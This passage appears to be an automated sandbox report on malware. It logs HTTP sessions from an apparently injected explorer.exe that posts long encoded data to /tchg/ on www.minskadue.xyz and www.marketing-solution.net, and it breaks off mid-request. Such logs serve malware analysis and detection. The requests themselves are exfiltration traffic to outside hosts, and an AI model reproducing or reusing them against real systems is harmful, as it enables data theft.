                                                                                                                    May 30, 2023 11:11:41.285211086 CEST1234OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4a 66 36 71 42 64 64 50 7e 53 4a 6f 35 7a 59 50 50 59 78 42 54 70 4b 48 38 73 4b 57 73 2d 76 6c 4c 4b 71 38 6c 6e 4c 51 50 5a 33 76 28 61 38 32 38 6c 56 6d 37 39 48 72 6d 6d 54 56 30 61 58 56 33 32 65 48 54 70 73 49 77 77 7e 37 4c 36 72 31 46 59 63 35 55 63 71 4e 72 6d 68 33 51 67 46 55 48 43 45 65 70 54 79 54 55 31 55 30 45 57 56 61 74 73 42 4d 64 52 39 33 67 64 62 65 4a 68 53 30 7e 4f 45 33 6d 61 6a 69 6e 37 64 66 46 4c 32 42 31 49 61 51 51 7a 45 73 4a 59 4c 6e 4a 54 30 69 6b 67 6f 34 45 6a 50 49 67 67 66 79 6f 46 54 5f 30 36 32 56 4d 67 68 36 31 39 75 6d 75 56 39 62 51 66 78 5a 51 50 56 5a 4a 50 69 65 43 62 4c 41 63 6c 63 31 46 63 62 35 6e 78 7a 52 54 38 63 44 6a 59 64 44 68 44 4b 5f 57 6a 7a 42 6f 65 41 57 6c 70 45 46 4b 55 46 75 31 4b 48 50 70 7a 4b 33 28 67 33 62 71 71 66 55 4a 77 50 73 45 57 69 33 4d 63 44 6a 6e 6b 34 4e 47 73 32 45 71 6d 36 6d 7e 52 68 49 4d 53 41 38 4a 6d 70 5a 4d 41 30 47 50 32 58 78 48 54 62 6c 74 6a 6a 30 53 45 7e 36 56 4f 59 68 4f 5f 7a 61 66 69 34 52 51 52 7e 33 76 66 51 4e 37 6d 31 45 76 77 6f 67 49 59 70 4c 53 33 6c 42 57 65 32 4d 66 48 4e 46 51 7a 54 39 52 44 74 41 30 57 7a 6d 51 4c 39 61 4f 74 45 59 4d 6b 55 77 47 31 53 77 44 6c 6e 71 37 69 5a 63 79 46 36 7a 65 6c 28 6e 70 76 71 63 30 58 48 32 36 41 65 45 64 64 55 67 73 74 71 6d 56 48 33 37 44 5f 79 6e 33 78 45 59 59 33 77 68 72 64 47 35 61 59 4c 4e 35 38 64 7a 6b 61 51 32 69 55 68 53 44 32 48 6b 48 38 57 75 32 4d 59 43 68 38 49 38 57 6c 35 58 4c 44 6b 49 52 4e 6b 6d 4b 41 35 69 51 5a 4a 57 4c 69 4a 30 28 41 6b 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpJf6qBddP~SJo5zYPPYxBTpKH8sKWs-vlLKq8lnLQPZ3v(a828lVm79HrmmTV0aXV32eHTpsIww~7L6r1FYc5UcqNrmh3QgFUHCEepTyTU1U0EWVatsBMdR93gdbeJhS0~OE3majin7dfFL2B1IaQQzEsJYLnJT0ikgo4EjPIggfyoFT_062VMgh619umuV9bQfxZQPVZJPieCbLAclc1Fcb5nxzRT8cDjYdDhDK_WjzBoeAWlpEFKUFu1KHPpzK3(g3bqqfUJwPsEWi3McDjnk4NGs2Eqm6m~RhIMSA8JmpZMA0GP2XxHTbltjj0SE~6VOYhO_zafi4RQR~3vfQN7m1EvwogIYpLS3lBWe2MfHNFQzT9RDtA0WzmQL9aOtEYMkUwG1SwDlnq7iZcyF6zel(npvqc0XH26AeEddUgstqmVH37D_yn3xEYY3whrdG5aYLN58dzkaQ2iUhSD2HkH8Wu2MYCh8I8Wl5XLDkIRNkmKA5iQZJWLiJ0(Ak.
                                                                                                                    May 30, 2023 11:11:41.362718105 CEST1235INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:41 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    66192.168.11.2049825109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:43.893507004 CEST1248OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4a 66 36 71 42 64 64 50 7e 53 4a 6f 35 7a 59 50 50 59 78 42 54 70 4b 48 38 73 4b 57 73 2d 6e 6c 4b 38 65 38 6b 41 58 51 4f 5a 33 76 33 36 38 7a 38 6c 56 5f 37 37 76 30 6d 6d 65 67 30 66 54 56 32 6c 6d 48 54 36 45 49 37 67 7e 34 42 61 72 33 42 59 63 6c 55 63 57 5a 72 6d 31 6e 54 52 42 55 56 53 30 65 75 69 79 53 4c 56 55 32 45 57 56 4f 7e 38 42 79 64 51 4a 6e 67 64 48 65 4a 6a 57 30 76 6f 41 33 71 74 33 69 34 4c 64 51 4c 72 32 43 73 59 61 66 51 7a 52 66 4a 59 4c 64 4a 58 6b 69 6b 6a 51 34 48 67 6e 4c 68 41 66 79 32 56 54 38 6a 4b 4b 4a 4d 6a 56 69 31 35 75 6d 75 57 39 62 52 5f 78 5a 62 4c 34 50 42 50 69 63 47 62 4c 74 4c 31 41 48 46 63 50 4d 6e 77 48 52 51 4e 34 44 78 61 31 44 75 47 32 5f 4b 7a 7a 50 73 65 42 4d 76 4a 45 5a 4b 58 74 79 31 4b 6e 31 70 31 6d 33 7e 42 58 62 34 62 66 58 4a 51 4f 47 4c 32 69 59 48 38 48 52 6e 6c 4a 55 47 73 33 66 71 6e 7e 6d 7e 67 52 49 43 7a 41 39 63 32 70 61 45 67 30 58 42 57 72 5f 48 53 7a 54 74 6a 37 6b 53 46 36 36 58 75 59 68 65 75 7a 5a 52 53 34 73 63 78 7e 66 68 5f 52 4c 37 6e 4a 59 76 30 34 61 64 34 31 4c 51 44 4a 42 55 2d 32 4e 50 33 4d 4f 62 54 54 5f 56 44 74 41 30 57 28 79 51 4c 78 61 4f 5a 49 59 43 7a 77 77 58 32 36 77 46 6c 6e 67 37 69 5a 4e 79 46 6e 4e 65 6c 33 46 70 76 61 79 30 53 28 32 36 52 4f 45 63 63 55 76 67 39 72 73 45 33 33 73 4d 66 7e 4a 33 78 59 51 59 33 67 4c 72 4f 79 35 62 59 62 4e 30 63 64 79 32 71 52 66 79 45 67 58 48 32 4c 34 48 38 37 5a 32 4d 73 6f 68 2d 49 38 56 7a 59 72 54 48 6f 6c 41 39 73 72 42 51 5a 62 5a 50 4e 2d 57 41 52 50 73 30 61 7a 33 4d 4f 42 4f 54 41 79 76 39 37 73 36 41 4f 6c 75 4f 36 5a 66 34 6b 39 42 61 6e 4f 55 53 4d 61 52 57 72 64 74 63 4d 68 42 49 7a 52 39 4a 66 41 30 46 74 34 32 78 53 74 7e 4b 38 5f 33 4f 32 32 58 57 54 4d 39 75 46 6c 73 35 64 57 79 33 64 62 53 37 58 78 57 2d 7a 2d 44 4c 72 44 49 7a 74 44 32 64 68 49 6a 4b 68 43 39 56 54 5a 71 43 71 6a 5a 69 4a 6f 67 34 58 75 68 50 77 76 68 47 53 31 65 65 53 6b 77 31 49 44 6f 68 6c 45 78 58 71 43 48 79 73 4d 55 6b 71 39 47 42 36 4d 62 35 76 6d 4f 33 4c 58 75 6b 42 75 37 2d 77 61 6f 6d 44 6a 36 41 34 4b 50 6e 4b 5f 4e 64 6f 62 33 41 62 6c 6f 67 28 6d 4d 4a 67 4c 28 71 5a 6a 56 6a 4b 41 4f 34 42 76 62 33 49 4e 7e 5f 54 4c 73 48 61 4b 4e 58 57 7a 52 69 7e 64 44 77 6a 44 67 44 64 37 73 30 59 6e 6a 52 59 68 46 43 7e 48 76 45 72 77 56 47 43 74 6e 71 4d 71 6d 71 48 79 78 30 42 57 30 66 4a 53 61 57 72 64 62 51 4a 4c 28 68 4d 37 6d 34 4a 32 4d 35 37 6a 48 53 54 59 72 47 55 76 33 32 38 57 73 34 4d 70 73 34 61 6c 54 62 64 57 78 6f 36 39 45 50 43 65 4f 59 69 78 37 34 54 4d 75 32 5a 68 74 6d 67 38 45 39 61 6e 55 79 65 50 59 47 6a 5a 62 71 41 4a 51 33 56 43 6c 32 49 34 32 73 48 43 6a 39 45 75 53 70 5a 61 56 46 56 62 6f 43 59 52 52 52 6d 6d 70 6b 39 74 66 33 49 36 39 43 6e 4c 78 41 4c 54 64 34 4d 36 76 68 74 59 28 46 62 61 63 34 63 6e 4c 49 49 67 33 55 63 33 78 6e 63 62 37 75 4e 57 5a 6b 32 48 6a 33 43 67 4f 48 4e 49 49 72 54 6d 57 39 58 2d 71 5a 38 44 7a 50 67 57 79 62 67 59 53 32 67 6d 73 73 33 43 51 41 55 42 66 36 68 58 73 79 31 56 48 4f 54 55 4e 77 69 35 56 38 76 66 7e 79 78 44 6e 48 52 63 6a 58 61 55 53 30 37 61 4b 74 39 69 35 4f 33 71 6d 59 38 6b 4c 56 4e 56 7a 2d 6a 31 70 4b 78 32 4b 61 7e 46 64 44 77 66 58 34 57 61 4d 2d 28 51 33 43 4c 31 48 5f 6d 54 31 4c 67 34 57 35 31 79 47 68 66 6d 37 4a 5a 56 28 4f 49 75 48 77 62 7a 78 77 4e 72 75 77 38 30 46 6e 70 6d 59 32 53 77 30 54 42 68 49 50 38 38 31 6c 46 79 73 6f 45 48 46 64 31 65 44 61 6f 31 41 6f 4f 4c 4b 4a 57 2d 6d 6f 51 73 28 50 62 46 76 49 72 6b 4e 35 42 57 64 71 69 66 7e 33 4e 47 78 49 71 6f 31 33 37 4c 56 58 32 6a 4a 74 62 4b 57 69 45 7a 33 52 48 43 65 4c 4f 39 76 65 61 74 69 72 73 64 6d 65 6a 76 32 44 49 46 41 53 42 7a 4e 67 45 7a 42 45 66 33 52 41 30 6a 67 69 6e 65 36 55 50 76 50 5f 77 45 4f 6b 37 36 6e 74 73 35 55 36 4e 59 42 58 6b 63 39 2d 33 43 6d 73 7a 48 52 30 31 5f 49 63 7a 55 41 43 4c 64 42 49 28 77 6c 75 4f 5a 59 5f 50 2d 32 4a 70 67 77 67 31 42 4a 6a 7a 36 71 42 34 51 38 5f 71 65 75 78 6d 69 34 33 4e 49 68 78 7e 42 6e 5a 42 51 41 57 4d 6c 39 4d 61 69 28 61 63 50 50 6a 4d 4a 68
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpJf6qBddP~SJo5zYPPYxBTpKH8sKWs-nlK8e8kAXQOZ3v368z8lV_77v0mmeg0fTV2lmHT6EI7g~4Bar3BYclUcWZrm1nTRBUVS0euiySLVU2EWVO~8BydQJngdHeJjW0voA3qt3i4LdQLr2CsYafQzRfJYLdJXkikjQ4HgnLhAfy2VT8jKKJMjVi15umuW9bR_xZbL4PBPicGbLtL1AHFcPMnwHRQN4Dxa1DuG2_KzzPseBMvJEZKXty1Kn1p1m3~BXb4bfXJQOGL2iYH8HRnlJUGs3fqn~m~gRICzA9c2paEg0XBWr_HSzTtj7kSF66XuYheuzZRS4scx~fh_RL7nJYv04ad41LQDJBU-2NP3MObTT_VDtA0W(yQLxaOZIYCzwwX26wFlng7iZNyFnNel3Fpvay0S(26ROEccUvg9rsE33sMf~J3xYQY3gLrOy5bYbN0cdy2qRfyEgXH2L4H87Z2Msoh-I8VzYrTHolA9srBQZbZPN-WARPs0az3MOBOTAyv97s6AOluO6Zf4k9BanOUSMaRWrdtcMhBIzR9JfA0Ft42xSt~K8_3O22XWTM9uFls5dWy3dbS7XxW-z-DLrDIztD2dhIjKhC9VTZqCqjZiJog4XuhPwvhGS1eeSkw1IDohlExXqCHysMUkq9GB6Mb5vmO3LXukBu7-waomDj6A4KPnK_Ndob3Ablog(mMJgL(qZjVjKAO4Bvb3IN~_TLsHaKNXWzRi~dDwjDgDd7s0YnjRYhFC~HvErwVGCtnqMqmqHyx0BW0fJSaWrdbQJL(hM7m4J2M57jHSTYrGUv328Ws4Mps4alTbdWxo69EPCeOYix74TMu2Zhtmg8E9anUyePYGjZbqAJQ3VCl2I42sHCj9EuSpZaVFVboCYRRRmmpk9tf3I69CnLxALTd4M6vhtY(Fbac4cnLIIg3Uc3xncb7uNWZk2Hj3CgOHNIIrTmW9X-qZ8DzPgWybgYS2gmss3CQAUBf6hXsy1VHOTUNwi5V8vf~yxDnHRcjXaUS07aKt9i5O3qmY8kLVNVz-j1pKx2Ka~FdDwfX4WaM-(Q3CL1H_mT1Lg4W51yGhfm7JZV(OIuHwbzxwNruw80FnpmY2Sw0TBhIP881lFysoEHFd1eDao1AoOLKJW-moQs(PbFvIrkN5BWdqif~3NGxIqo137LVX2jJtbKWiEz3RHCeLO9veatirsdmejv2DIFASBzNgEzBEf3RA0jgine6UPvP_wEOk76nts5U6NYBXkc9-3CmszHR01_IczUACLdBI(wluOZY_P-2Jpgwg1BJjz6qB4Q8_qeuxmi43NIhx~BnZBQAWMl9Mai(acPPjMJhBZOQb6u6Seu(UL_SkgjnusKKwDBmCIOc2WkDEd8HfusYQW7MJCG5eJDnGB3gBxK5ANkMaLQMEoi5j0GYBfoO5mDoOqchm(ckkXIwHZGPS1Yi_2P1Khzt-wIfnbJuxQA(A2W9fDv2WgfVl3nlIyteB2Po-tY4_Bg2BpeHiXQyhyGpu4hFDLzfa6jkg5pR-ETj4FB0JVcXM5oPVF8ZXIv(e53waYf0mN3V8IDxijdcfCgCaCDmQjItWHeTmGOW0PaCFD6BEYGWJ4V6nEHoQVbhhV_YrFcpcfmhMP48WypWvvZakcH0wbh3zo2pezgjv4TNVpSOnGMxK7u8wkZgNj9~MvfFgT15R98uWEd2ZNy9JcFMO0xysz4h7aIj9sBmPZ8cOahKJbPG1zj9qcbmId5yQonZQHIsd7mqtCvX7pe87GWgUZqB5n2dVzVFXmyGBQCccEITSudzJpyEAprLINl~cYzSU5bp9NQNRtMx6cl9mA2A7z4PR8rAnCR6UVBZLHWN4O5F2aHPv6S31KsdxorwyVCuWexPuy-er1-sLVZzMaY~B70rmT415izLjsYWYUpFFpAAZdy5q~lHciTdehtO1YHZjbZgWaNMmkXOiRkwJQ5VRqxDpFu5mZxLxBKGH0bMjfc7lt6N5ZDdzJ7XGFXbWXCNeeQhvn05KGW9pbsKGM36GFe11lZteLfdYyvxcmo(1Os2ty6ziVF5LVafuUxlVdP7NzdPGAhARTGo6XYRHHAiich~NHXezcaTkvP8CoC7xUoLRNSvII1l1J0YEA_iUH-Djuf9KoNsuhFhpcB1MpLGLP3~kU_47rqLkN7GWELCzB-BZi0PWuWM-5fH5X5~u(QQVk-BHWshh2CE1mEOEO-InjIMLEDVY(D8JUD0nu53ZeS(Zum6m1PrmUz419EGhc_Z9kB56D-Bbfam7ZrDfjOjIi-aQRmMKZqDYrskUGVK3XPFLxIU4gJGdNmBEMB8II5BPH6CnU5Sg7ivAXospUIGb9vs29TU2rQSgpcxWpUARFqy6GWOWltUbCoA070WlQydNSX~B5UUgTiS4zi6xFZRSG711DhDoaBg7zb8pmd6YVWhBcVmPWMfJai3Q9u00EIofHnwwQFzW~QyCkXJyHHfYGYz1C8f5QbdHuyKMVAGlQaZGzBoVtaF1XKpOCiwsxUvZ43f4asr57W3_K8jGpUfrw2rYTNFJo2b1hiDmnM3jukIaaR46psIjyHyGq_tLwMrZIersW7nC0JOPh-coC3krU5pIXVdx~WUcr0kFzd9Yug0plGjcObSla3NQvGbrv-mDSJ73WDWG7V0EtC3u(jgz1v7zsxGXue2kUz3uuzcooEjCkucKYlGOURlYD-9Kozp8hzaHAYXHuvA-FuUTQ4C9CbBBgFzEEziefUSoek6jSRZlb9XpYH66KQRZiztUNEkNg-Tp8PthmnRBSTm2dc7_OMyWwP6EEspU8bFJMTfyCvV6RSyH6dglap7dpYZsXZyvPiML~rTQIm7zdSLHRjmZYIYZjTefy3XlTFkGuNkkxJJkIT89n3qvTWoEI_m93_rQyjP9s3kSW_2gjLwgDAHKAaB5UXXUYs~_4ecfmRRAwLUE1MqajJ0sF83rVhwNF9qKszdolxQQRyVlzM1tAOIY2QrqKNHz(oRYbbt51M~mgOMTQp2bW0SaCyKfQiu33qas5eL6ZiURv2rb(Flzn8FxCyyOSu4yyVZcvLY2GiW0ry1vFhJqMITrvbTNH-Mxh5LnNLIx686B70Y2sWycq09rK-BBrADn2ytstgEAyeqSN-vu7ubIMWbZmgmE1f6AsnBXoUZycrULmmNsxMy6RxtNPVKESFazLZD9hHIrjVwnzGMtBfqOTC~pOfVCCM5t5i(hYBdoj_WIucfF0J4Vs4y-hv0ptZnhGFpNivudl0yiO6wyQP~GTuqViGlu~chJiaF3f-DgaaZVsmTv(SbkhCQ6huDwlkh5lfnXLjSEnJTobULPzGsMVY3SDIMkthejcM685plGkaxjOChZ4BbJXeu2vq3n8-ZLUIthwCxP9_1JD5xF4JxaJ_VMMmv-GGNLgBbjWGNa(Jn92AqaGEyPAcpTRyK7j2ggQWBO2Sb0oLorC1(dycCD~Pqf11MIFnucoO4pB3U5NwjcIipCS1kNYSE0(C2R6pdpW9fwjV0A7E0rD7rBIKwbYtmlhNV6vcrkENvjl5TKmv4rybG68Zo86tRprudW4ZCcsF7UZZLiKpCTPSwAjMcSKqoBZ9YJSpc-radGS3Jq9YY6g3GWAHLp1SszAWaloPyktKWOBPYO5M1lsuL8NIsLE_9oMhKaHmbPJDdwNuKCoSWVPslUxUkRCcPGrqTAWLlY2nKFq6VJG43Pmlz-WBycVHhz5t0xKJXZQWlA4-90MI(7rDD-5FLo3UrKDEHYfP4El3xINlTJTBpHhdoStd2GQU(O1ZVVGNuKC2ulKCcO8dAuHhk9yLSMZ1gwtNvjhwo_IaEuG87av7ZdthQnoSFMYw2nm_jaP3gekxNcIsg-QjOfr06VGP3l1hc6K-Wx3PjvPRgQHk0xPXc9uN8DQUsDI1NwmCcGV5As9sOzXnYD(XGvMaicyZljKeXeqF1HnWiQ1GHkZMHCuklMRwTiErLZTDxV(008qyeHiPFKdIjCCxdnUSZfDgHhovUPyRCqE-SXn72N(5ln0xSBzGw97szdz-7pAE4ixYtCgGNJMDF-YOnqNh
                                                                                                                    May 30, 2023 11:11:43.971282005 CEST1250OUTData Raw: 66 47 6e 33 70 38 69 74 77 6d 5a 38 42 4e 62 32 37 32 75 71 75 53 36 43 42 28 58 38 46 73 5a 35 4c 67 6f 33 5a 65 51 43 49 4a 35 5a 5f 72 6b 52 6f 4d 61 68 7a 69 6e 7e 33 43 77 51 74 54 72 33 39 46 57 41 30 50 5a 4e 41 31 47 4a 42 4d 74 6b 4d 70
                                                                                                                    Data Ascii: fGn3p8itwmZ8BNb272uquS6CB(X8FsZ5Lgo3ZeQCIJ5Z_rkRoMahzin~3CwQtTr39FWA0PZNA1GJBMtkMpEbFrz8p~tx_T3OLZIAnPtnywsgVgWMcG1lf7DjjeJcnKRONYIVdFIpSWal856jwTCKWYBkhcRmzQfEBA9r-gjMvGleJYznHk5yBONdMLt~cI5cqSD5RS9nd(wjhPcjOh7oPF0GM3feRoS9S2vmUXQzpgWIviQo23W
                                                                                                                    May 30, 2023 11:11:43.971463919 CEST1265OUTData Raw: 2d 71 77 54 36 72 65 4f 75 43 34 39 54 62 67 53 78 4b 6e 4f 56 71 6e 4f 5a 53 4c 73 39 6c 70 59 64 4b 77 38 6e 41 64 41 57 5a 6b 31 58 41 78 38 36 65 4c 56 47 56 39 66 4b 54 33 68 50 54 7a 57 71 31 44 68 48 73 7a 7e 6a 52 45 31 33 36 33 45 63 42
                                                                                                                    Data Ascii: -qwT6reOuC49TbgSxKnOVqnOZSLs9lpYdKw8nAdAWZk1XAx86eLVGV9fKT3hPTzWq1DhHsz~jRE1363EcB3VPrElc33HxDLJkczQNXwDaxThzUmEBi292K3FdsxWhzFecX1Xs(z9PLrxpwBTDccKmFxqKQfhMERXfPRvI8DEutPd_32buuq6oNdd_1H0ZRL5zgDXMBkY3j2o6atGmbbdIoHMROpPT9nA2hJNuT-e0J8ieQh7Efq
                                                                                                                    May 30, 2023 11:11:43.973906994 CEST1266INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:43 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                                                                                                                    May 30, 2023 11:11:43.974242926 CEST1271OUTData Raw: 6a 38 62 73 67 70 45 4c 6a 79 6e 6d 68 6d 62 77 61 47 35 53 42 34 78 47 5a 79 35 57 63 37 58 43 30 73 48 64 35 44 4b 64 5f 67 37 4c 30 36 54 46 63 78 6c 6b 70 43 6a 73 75 36 68 67 51 7a 4b 4f 4a 55 74 45 42 6b 78 49 6f 61 37 4b 31 78 5f 28 51 4c
                                                                                                                    Data Ascii: j8bsgpELjynmhmbwaG5SB4xGZy5Wc7XC0sHd5DKd_g7L06TFcxlkpCjsu6hgQzKOJUtEBkxIoa7K1x_(QLU0m4GRxcj1RqhlL3M3YxVv2JWwgjMsao1LcNW~kpTehCOWixvzaciyI7UL4bqTlOGwmESdQ9w1XowFxzS(924afbWbadv(Tw_jbEnDKDDV0tIxl13PaRQNaMHYubIqLo0cZ(uDn(Wg-xtYXbMMhBfaCl9uK5qTVil
                                                                                                                    May 30, 2023 11:11:43.974332094 CEST1273OUTData Raw: 63 77 77 6d 45 61 4f 63 65 7e 38 30 6c 77 52 6a 4d 46 55 47 77 63 32 64 4f 32 57 28 51 46 76 42 66 41 53 31 7a 55 39 44 76 47 62 64 55 56 79 52 74 33 75 45 50 77 31 4f 6c 70 5f 56 46 66 55 33 43 47 49 39 4b 45 49 4f 51 52 43 4a 52 78 4b 65 4d 73
                                                                                                                    Data Ascii: cwwmEaOce~80lwRjMFUGwc2dO2W(QFvBfAS1zU9DvGbdUVyRt3uEPw1Olp_VFfU3CGI9KEIOQRCJRxKeMsi982z(mddcuir(zjgpw8ISS2hFky2ka6cLMNEGieEiTkUD58ZgC(qo59DsxduM_SePQmlsarHvuirJDxeRo9RVHMgBlusynFJbwun5IapUwf1h7VbVtv-SshjkQDh8qkklAR1zlpDyL5lf9xxh5tnZ_qAyy2cSrp_
                                                                                                                    May 30, 2023 11:11:44.048996925 CEST1281OUTData Raw: 68 35 6c 72 58 7e 39 55 49 64 4b 51 69 53 35 33 55 6e 6f 67 6d 47 73 67 74 63 6a 51 67 65 5f 76 47 37 6a 46 64 71 52 47 35 65 37 71 36 52 63 52 43 7e 47 36 4e 48 33 6f 4a 76 75 68 4e 45 61 49 56 4a 72 32 4c 34 6d 4e 42 74 6e 47 69 73 69 55 5a 64
                                                                                                                    Data Ascii: h5lrX~9UIdKQiS53UnogmGsgtcjQge_vG7jFdqRG5e7q6RcRC~G6NH3oJvuhNEaIVJr2L4mNBtnGisiUZdToRt_kdMXoYrQVTRaOzXacj4zRuhmkkEeV1WnHZ3auxp7enUR0nKKqc3ZlrJnFXJ-evieovjtrLn6rpPxvmRj~5ZvrYU8ZZD5B1Gf788lVAs7i0mwRQB7ykt63vclK1gq2E64LAR_SDqnX8oGiGanLhex7VqeECO5
                                                                                                                    May 30, 2023 11:11:44.049118042 CEST1286OUTData Raw: 55 76 34 7a 68 4d 62 31 6d 57 67 4c 6e 4b 57 6f 69 32 74 6f 77 6e 69 68 4d 6f 47 79 4e 73 2d 37 45 56 55 7a 59 54 4e 4b 30 59 59 71 66 32 2d 6a 6b 49 55 30 41 46 70 72 68 64 2d 69 57 34 58 54 34 48 61 61 68 37 49 6d 30 4a 6b 67 39 56 47 65 62 33
                                                                                                                    Data Ascii: Uv4zhMb1mWgLnKWoi2townihMoGyNs-7EVUzYTNK0YYqf2-jkIU0AFprhd-iW4XT4Haah7Im0Jkg9VGeb34HdO0sGy6Q3qpCRSSe1DruelxDM412-PT1WZYChcaXcNSOvrcdZGow8pmTiUsR3wudqOLncimRmzqOrcconbWQ7RR0zgVShHfg-neivTBIkng0RGg4lRtD7OGF61HItMYD8aI(ZaLh7BBl4v4dmpdXmvjae6wgB7H
                                                                                                                    May 30, 2023 11:11:44.049173117 CEST1287OUTData Raw: 52 78 71 33 50 48 67 63 33 65 41 49 67 6b 4f 42 54 61 74 51 71 66 4d 75 61 64 39 4c 72 28 34 47 31 66 68 57 68 28 70 46 68 53 56 34 31 49 76 74 6e 31 48 4e 4c 34 5f 56 51 51 33 4f 43 6d 6c 79 48 6f 38 77 41 39 4c 41 54 35 66 41 6d 4b 57 54 41 5a
                                                                                                                    Data Ascii: Rxq3PHgc3eAIgkOBTatQqfMuad9Lr(4G1fhWh(pFhSV41Ivtn1HNL4_VQQ3OCmlyHo8wA9LAT5fAmKWTAZ3Pr7dtJSGOLA6wyY4TxsU4yZPeasCREbUcMnmN7Ns7thyCB7Ab8EmkVgJVbJeMb~GKwwWzvxoGjrtBpnGKspE8g91~Dpldzy6wK5c~oWQMxO1iBDsWY4NJLUzjJ48v5Ub3r3_2yBfPWP1j9GR05YNhptTtV4FVX~F


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    67192.168.11.2049826109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:46.498918056 CEST1288OUTGET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:11:46.574074984 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:46 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    68192.168.11.204982791.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:51.588654995 CEST1290OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
